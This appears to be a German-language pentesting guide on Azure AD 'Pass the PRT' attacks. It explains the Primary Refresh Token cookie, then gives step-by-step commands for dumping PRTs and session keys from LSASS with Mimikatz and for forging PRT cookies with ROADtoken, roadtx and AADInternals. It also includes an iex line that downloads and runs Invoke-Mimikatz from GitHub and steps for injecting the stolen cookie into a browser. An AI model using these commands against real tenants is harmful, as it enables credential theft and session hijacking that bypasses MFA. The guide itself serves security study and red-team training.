Az - Pass the PRT

Was ist ein PRT

Überprüfen, ob du einen PRT hast

Dsregcmd.exe /status

Im Abschnitt SSO State sollte der AzureAdPrt auf YES gesetzt sein.

Im selben Output können Sie auch sehen, ob das Gerät mit Azure verbunden ist (im Feld AzureAdJoined):

PRT Cookie

Das PRT-Cookie wird tatsächlich x-ms-RefreshTokenCredential genannt und ist ein JSON Web Token (JWT). Ein JWT enthält 3 Teile, den Header, Payload und Signatur, getrennt durch einen . und alle url-sicher base64-codiert. Ein typisches PRT-Cookie enthält den folgenden Header und Body:

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

Der eigentliche Primary Refresh Token (PRT) ist im refresh_token gekapselt, der durch einen Schlüssel verschlüsselt ist, der unter der Kontrolle von Azure AD steht, wodurch sein Inhalt für uns undekodierbar und undurchsichtig wird. Das Feld is_primary kennzeichnet die Kapselung des Primary Refresh Token innerhalb dieses Tokens. Um sicherzustellen, dass das Cookie an die spezifische Anmeldesitzung gebunden bleibt, für die es vorgesehen war, wird der request_nonce von der Seite logon.microsoftonline.com übertragen.

PRT-Cookie-Fluss unter Verwendung von TPM

Der LSASS-Prozess sendet den KDF-Kontext an das TPM, und das TPM verwendet den Sitzungsschlüssel (gesammelt, als das Gerät in AzureAD registriert wurde und im TPM gespeichert ist) und den vorherigen Kontext, um einen Schlüssel abzuleiten, und dieser abgeleitete Schlüssel wird verwendet, um das PRT-Cookie (JWT) zu signieren.

Der KDF-Kontext ist ein Nonce von AzureAD und der PRT, der ein JWT mit einem Kontext (zufällige Bytes) mischt.

Daher ist es, selbst wenn der PRT nicht extrahiert werden kann, weil er sich im TPM befindet, möglich, LSASS zu missbrauchen, um abgeleitete Schlüssel aus neuen Kontexten anzufordern und die generierten Schlüssel zu verwenden, um Cookies zu signieren.

PRT-Missbrauchsszenarien

Als normaler Benutzer ist es möglich, PRT-Nutzung anzufordern, indem man LSASS nach SSO-Daten fragt. Dies kann wie native Apps erfolgen, die Token vom Web Account Manager (Token-Broker) anfordern. WAM leitet die Anfrage an LSASS weiter, das Token unter Verwendung einer signierten PRT-Bestätigung anfordert. Oder es kann mit browserbasierten (Web-) Flows erfolgen, bei denen ein PRT-Cookie als Header verwendet wird, um Anfragen an Azure AS-Anmeldeseiten zu authentifizieren.

Als SYSTEM könnten Sie den PRT stehlen, wenn er nicht durch TPM geschützt ist, oder mit PRT-Schlüsseln in LSASS unter Verwendung von Krypto-APIs interagieren.

Pass-the-PRT-Angriffsszenarien

Angriff - ROADtoken

Für weitere Informationen zu diesem Weg siehe diesen Beitrag. ROADtoken wird BrowserCore.exe aus dem richtigen Verzeichnis ausführen und verwenden, um ein PRT-Cookie zu erhalten. Dieses Cookie kann dann mit ROADtools verwendet werden, um sich zu authentifizieren und einen persistenten Refresh Token zu erhalten.

Um ein gültiges PRT-Cookie zu generieren, benötigen Sie zuerst ein Nonce. Dies können Sie mit folgendem Befehl erhalten:

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Oder mit roadrecon:

roadrecon auth prt-init

Dann können Sie roadtoken verwenden, um einen neuen PRT zu erhalten (im Tool aus einem Prozess des anzugreifenden Benutzers ausführen):

.\ROADtoken.exe <nonce>

Als Einzeiler:

Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Dann können Sie den generierten Cookie verwenden, um Tokens zu generieren, um sich mit Azure AD Graph oder Microsoft Graph anzumelden:

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>

Angriff - Verwendung von roadrecon

Angriff - Verwendung von AADInternals und einem geleakten PRT

Get-AADIntUserPRTToken holt das PRT-Token des Benutzers vom Azure AD-verbundenen oder Hybrid-verbundenen Computer. Verwendet BrowserCore.exe, um das PRT-Token zu erhalten.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Oder wenn Sie die Werte von Mimikatz haben, können Sie auch AADInternals verwenden, um ein Token zu generieren:

# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token ac cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

Gehe zu https://login.microsoftonline.com, lösche alle Cookies für login.microsoftonline.com und füge ein neues Cookie ein.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Dann gehe zu https://portal.azure.com

Angriff - Mimikatz

Schritte

1. Der PRT (Primary Refresh Token) wird aus LSASS (Local Security Authority Subsystem Service) extrahiert und für die spätere Verwendung gespeichert.

2. Der Session Key wird als nächstes extrahiert. Da dieser Schlüssel zunächst ausgegeben und dann vom lokalen Gerät neu verschlüsselt wird, erfordert dies eine Entschlüsselung mit einem DPAPI-Masterkey. Detaillierte Informationen über DPAPI (Data Protection API) finden Sie in diesen Ressourcen: HackTricks und für ein Verständnis seiner Anwendung, siehe Pass-the-cookie attack.

3. Nach der Entschlüsselung des Session Key werden der abgeleitete Schlüssel und der Kontext für den PRT erhalten. Diese sind entscheidend für die Erstellung des PRT-Cookies. Insbesondere wird der abgeleitete Schlüssel zum Signieren des JWT (JSON Web Token) verwendet, das das Cookie bildet. Eine umfassende Erklärung dieses Prozesses wurde von Dirk-jan bereitgestellt, zugänglich hier.

Eine detaillierte Erklärung des durchgeführten Prozesses zur Extraktion dieser Details finden Sie hier: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

Sie können mimikatz verwenden, um den PRT zu extrahieren:

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

(Bilder von https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)

Kopiere den Teil, der mit Prt gekennzeichnet ist, und speichere ihn. Extrahiere auch den Sitzungsschlüssel (den KeyValue des ProofOfPossesionKey Feldes), den du unten hervorgehoben sehen kannst. Dieser ist verschlüsselt und wir müssen unsere DPAPI-Masterkeys verwenden, um ihn zu entschlüsseln.

Um den Sitzungsschlüssel zu entschlüsseln, musst du deine Privilegien auf SYSTEM erhöhen, um im Computer-Kontext auszuführen und den DPAPI-Masterkey zur Entschlüsselung verwenden zu können. Du kannst die folgenden Befehle verwenden, um dies zu tun:

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Option 1 - Full Mimikatz

• Jetzt möchten Sie beide Context-Werte kopieren:

• Und den abgeleiteten Schlüsselwert:

• Schließlich können Sie all diese Informationen verwenden, um PRT-Cookies zu generieren:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

• Gehe zu https://login.microsoftonline.com, lösche alle Cookies für login.microsoftonline.com und füge ein neues Cookie ein.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

• Then go to https://portal.azure.com

Option 2 - roadrecon using PRT

• Erneuern Sie zuerst den PRT, der in roadtx.prt gespeichert wird:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

• Jetzt können wir Tokens anfordern mit dem interaktiven Browser mittels roadtx browserprtauth. Wenn wir den Befehl roadtx describe verwenden, sehen wir, dass das Access Token einen MFA-Anspruch enthält, da das in diesem Fall verwendete PRT ebenfalls einen MFA-Anspruch hatte.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Option 3 - roadrecon mit abgeleiteten Schlüsseln

Mit dem Kontext und dem von mimikatz abgeleiteten Schlüssel ist es möglich, roadrecon zu verwenden, um ein neues signiertes Cookie zu generieren mit:

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>

Referenzen

• https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

• https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/

• https://www.youtube.com/watch?v=x609c-MUZ_g